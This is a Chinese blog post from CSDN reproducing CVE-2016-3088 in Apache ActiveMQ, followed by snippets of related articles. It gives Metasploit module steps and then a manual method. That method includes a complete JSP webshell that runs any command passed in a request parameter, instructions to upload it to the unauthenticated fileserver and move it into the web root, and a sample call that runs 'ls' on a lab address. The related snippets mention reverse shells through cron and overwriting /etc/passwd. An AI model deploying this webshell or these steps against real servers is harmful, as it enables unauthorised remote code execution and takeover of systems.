CVE-2016-3088漏洞利用

已于 2022-04-25 20:55:53 修改
阅读量295 收藏 1
点赞数
分类专栏: Metasploit 文章标签: kali
于 2022-04-24 11:52:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53030229/article/details/124379094
版权

文章目录

方法一:使用metasploit

1、查找漏洞

search CVE-2016-3088
在这里插入图片描述#### 2、使用该模块
这里就一个模块,直接使用就行了
use 0
在这里插入图片描述

3、设置参数

1、show options 2、set RHOSTS 192.168.0.1(你自己ip)
在这里插入图片描述

4、成功利用

在这里插入图片描述

方法二:burpsuit抓包

1、上传webshell

192.168.142.132:8161/fileserver/

<%@ page import= "java.io.*"%>
<%
out.print("Hello</br>");
String strcmd= request.getParameter("cmd");
String line= null;
Process p= Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line= br.readLine())!= null){
 out.print(line+" </br>");
}
%>

在这里插入图片描述

2、将其移至/opt/activemq/webapps/api/s.jspWeb 目录中的 API 文件夹

Destination: file:///opt/activemq/webapps/api/1.jsp

在这里插入图片描述

http://192.168.142.132:8161/api/1.jsp?cmd=ls

在这里插入图片描述

注:这是我的报错原因和解决方法,如有冒犯和错误,请及时告知

文章借鉴https://www.bilibili.com/video/BV1844y1s78r?spm_id_from=333.337.search-card.all.click

ter_ret
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ漏洞利用
打代码的小女孩
11-04 647
背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了...
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现
m0_69994768的博客
01-23 1139
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088
CVE-2016-3088
龙卷风摧毁停车场
02-24 309
2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。
ActiveMQ CVE-2016-3088
菜鸟的学习笔记
06-28 202
1. 环境搭建 使用vulhub的配置执行命令:docker-compose up -d 一键启动漏洞环境 环境监听61616端口和8161端口,其中8161是web控制台端口。此漏洞出现在 Web 控制台中。 访问http://your-ip:8161/查看网页,说明环境已经运行成功。默认的 ActiveMQ 帐户和密码是admin。 2. 漏洞复现 首先我们先访问http://your-ip:8161/admin/test/systemProperties.jsp,来查看绝对路径。 之后需要使用B
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞
wangluoanquan111的博客
01-31 902
MOVE方法还是具有很大危险性的,慎用!任意文件写入还有其他的思路:写入webshell(修改jetty.xml只是为写入webshell排除掉admin和api需要登录的前提条件)写入cron文件(定时反弹shell)写入ssh key在此献上大佬的文章,对手上述三种方法针对改漏洞都做出了详细过程的讲解身为小白的我还需要继续深造阿。。。
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特权的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
exploit-CVE-2016-7434:NTPD远程DOS漏洞利用和易受攻击的容器
02-05
CVE-2016-7434 ntpd DOS攻击 Ntpd具有空指针引用,该引用可能触发崩溃的应用程序。 根据NTP.org的说法,“如果将ntpd配置为允许来自发送精心制作的恶意数据包的服务器的mrulist查询请求,则ntpd会在收到该精心制作的...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
CVE-2016-9079:Ubuntu x64上CVE-2016-9079的演示漏洞利用
04-28
CVE-2016-9079是一个典型的JavaScript引擎漏洞,展示了攻击者如何利用编程语言的内部机制来破坏系统安全。了解并防范这类漏洞对于维护网络环境的安全至关重要。在日常使用中,保持操作系统和应用程序的更新,结合...
ActiveMQ--CVE-2016-3088
weixin_37639863的博客
02-17 722
cve-2016-3088|LOFTER(乐乎) - 让兴趣,更有趣cve-2016-3088相关日志 - LOFTERhttp://www.lofter.com/tag/CVE-2016-3088 ActiveMQ任意文件写入漏洞(CVE-2016-3088)_skr...的博客-CSDN博客ActiveMQ任意文件写入漏洞(CVE-2016-3088)ActiveMQ介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、...
CVE-2016-3088(ActiveMQ任意文件写入漏洞)
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1541
该漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
maverickpig的博客
07-01 709
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) 本文来源于vulhub漏洞库,为本人复现笔记,如有侵权可联系我删除* 该漏洞工作中遇到过几次,记个笔记先 漏洞详情 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3016
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ远程代码执行漏洞复现 (CVE-2016-3088)
m0_49025459的博客
10-20 244
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成功。
vulhub ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
箭雨镜屋
05-23 1391
引言 今天来复现一下ActiveMQ任意文件写入漏洞 (CVE-2016-3088) vulhub的官网有对这个漏洞的英文介绍ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) 本文主要分为三个部分: 漏洞原理(基于vulhub)以及知识点引申 漏洞复现 漏洞引发的思考 漏洞介绍和知识拓展 背景简述和漏洞详情部分来源于vulhub 背景简述 ActiveMQ的web控制台分为三个应用,admin、api和fileserver,其中ad
ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
m0_58596609的博客
01-21 3727
ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
CVE-2016-3088 ActiveMQ漏洞复现
Makboli的博客
06-30 675
ActiveMQ漏洞复现CVE-2016-3088
CVE-2016-6329 windows漏洞修复
07-08
CVE-2016-6329是一个存在于Windows操作系统的漏洞,通过利用该漏洞,攻击者可以提升其权限并执行恶意代码。如果您的系统受到此漏洞的威胁,建议您立即采取以下措施修复漏洞: 1. 更新操作系统:确保您的Windows操作系统已经安装了最新的安全更新和补丁程序。微软通常会发布针对已知漏洞的更新,您可以通过Windows Update自动获取并安装这些更新。 2. 使用可信的安全软件:安装并定期更新可信的安全软件,如杀毒软件、防火墙等,以提供额外的保护层。 3. 谨慎下载和安装软件:只从官方和可信的来源下载和安装软件,并确保您的下载渠道和安装源是安全的。 4. 强化系统安全设置:禁用不必要的服务和功能,限制用户权限,使用强密码,定期备份重要数据等,以增强系统的整体安全性。 请注意,上述建议仅适用于修复CVE-2016-6329漏洞,对于其他潜在的安全问题,建议您与专业的安全团队或咨询机构进行进一步的沟通和评估。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值